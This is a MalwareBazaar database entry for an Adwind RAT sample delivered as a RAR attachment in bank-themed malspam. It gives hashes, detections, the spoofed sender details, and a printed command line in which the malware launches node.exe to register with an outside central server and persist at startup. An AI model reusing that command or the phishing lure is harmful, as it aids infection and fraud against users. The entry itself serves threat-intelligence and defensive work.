MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 cb49b3940531bc06fa3c491c14afffad0b2ddd8acda36e3efa37dfe06881adbf. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Adwind


Vendor detections: 3


Intelligence 3 IOCs YARA File information Comments

SHA256 hash: cb49b3940531bc06fa3c491c14afffad0b2ddd8acda36e3efa37dfe06881adbf
SHA3-384 hash: ce718b101b1b5557d7957d6250a54743d844e23f3cd08420e2c1268268cd4ba0dd912e0e15aef1d592d961153e0780dc
SHA1 hash: b31ed6a6f5b87b41f6f600fc78bdce4d7305f3ab
MD5 hash: 392989380ad738dbf6e53593087f60ae
humanhash: comet-lion-freddie-arkansas
File name:117-202056-43496_117-50-202056-43496.RAR
Download: download sample
Signature Adwind
File size:7'420 bytes
First seen:2020-05-06 16:59:14 UTC
Last seen:Never
File type: rar
MIME type:application/x-rar
ssdeep 192:mmqmOTF8vGrHu0Cvqi+fXHOq80/IFeZKtsPHqod:mmqCvGrHu0Cvqi+Pu2/geZKtsPHPd
TLSH 8CE1AFD0F5518D59AE4FCA5B40C0071E877FE667F1BBDD426006C3E8E24C1E1A48E852
Reporter abuse_ch
Tags:Adwind qua rar RAT


Avatar
abuse_ch
Malspam distributing Adwind:

HELO: mout.kundenserver.de
Sending IP: 212.227.126.133
From: DBSeAdvice@dbs.com <dbseadvice@dbs.com>
Reply-To: dbseadvice@dbs.com
Subject: Bank Fund Transfer//00017
Attachment: 117-202056-43496_117-50-202056-43496.RAR (contains "117-202056-43496_117-50-202056-43496.jar")

C:\Users\USERNAME\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\USERNAME\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --central-base-url https://central.qhub.qua.one --group user:1719@qhub-subscription.store.qua.one --register-startup

Intelligence


File Origin
# of uploads :
1
# of downloads :
90
Origin country :
n/a
Vendor Threat Intelligence
Gathering data
Threat name:
ByteCode-JAVA.Trojan.Frs
Status:
Malicious
First seen:
2020-05-06 17:36:38 UTC
File Type:
Binary (Archive)
Extracted files:
9
AV detection:
10 of 30 (33.33%)
Threat level:
  2/5
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam

Adwind

rar cb49b3940531bc06fa3c491c14afffad0b2ddd8acda36e3efa37dfe06881adbf

(this sample)

  
Dropping
Adwind
  
Delivery method
Distributed via e-mail attachment

Comments